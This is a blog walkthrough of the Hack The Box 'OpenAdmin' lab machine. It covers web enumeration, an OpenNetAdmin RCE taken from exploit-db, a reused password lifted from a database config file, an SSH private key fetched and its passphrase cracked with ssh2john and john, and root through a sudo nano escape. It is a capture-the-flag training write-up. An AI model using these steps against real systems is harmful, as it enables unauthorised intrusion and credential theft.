OPENADMIN-HTB-WALKTHROUGH

Posted by on


Greetings to all, This is a walkthrough of openadmin which is Linux box and easy rated.

1. PORT SCAN

The port scan result shows two ports are open:
  1. 22 for ssh.
  2. 80 for Http.
ports

2. WEB ENUMERATION


The port 80 shows an Apache default page. Well the page does not bring anything interesting, So I ran Dirbuster for directory listing and I found few directories.
/ona, /music
/ona shows a guest login portal with version details. I quickly google the version no and service OpenNetAdmin(ona) and I found an RCE vulnerability and its exploit from exploitdb.
https://www.exploit-db.com/exploits/47691

/ona

The exploit gave me a low privilege user shell i.e www-data.

www-data shell


3. Taking USER1.


First, I tried to list all the users in the box. I use ‘cat /etc/passwd’ and I found the following users:
  1. root
  2. joanna
  3. jimmy
The shell landed me under /opt/ona/www. To gain other user access I started enumerating and after a while, I found a database_settings.inc.php file under:
/opt/ona/www/local/config/database_settings.inc.php


database file


This file contains the password of ‘ona_sys’. I tried the same password against the users we found and the password hits for jimmy. Then I became jimmy through ssh login.

jimmy login

 

4. Taking USER2.

 

Note: jimmy belongs to an internal group. You can check it through : groups jimmy. Now on further enumeration, I found a Web directory named ‘internal’ under /var/www/

main.php

This directory contains PHP files and one interesting file is ‘main.php’ which is the key to taking access over joanna. Main.php gives the private key of joanna on execution. Since internal is web directory, so there should be Virtualhost config file in /etc/apache2/sites-enabled/

virtuathost config


now through curl, we got the private key of joanna.
 
id_rsa of joanna


Creating the hash of private key and cracking the hash with john gives the passphrase of the private key. And this allows us to login as joanna.
     1. python ssh2john.py id_rsa > hash
     2 . john hash --wordlist=/usr/share/wordlists/rockyou.txt


cracking passphrase


5.ROOT

 

Through ‘sudo -l’, we can see that joanna can run /bin/nano /opt/priv without the root password. Then with the help of gtfobins, we can break out from restricted environments by spawning an interactive system shell.
  • sudo /bin/nano /opt/priv
    gtfobins

    rooted



Hacker,Developer,Human

Comments

Post a Comment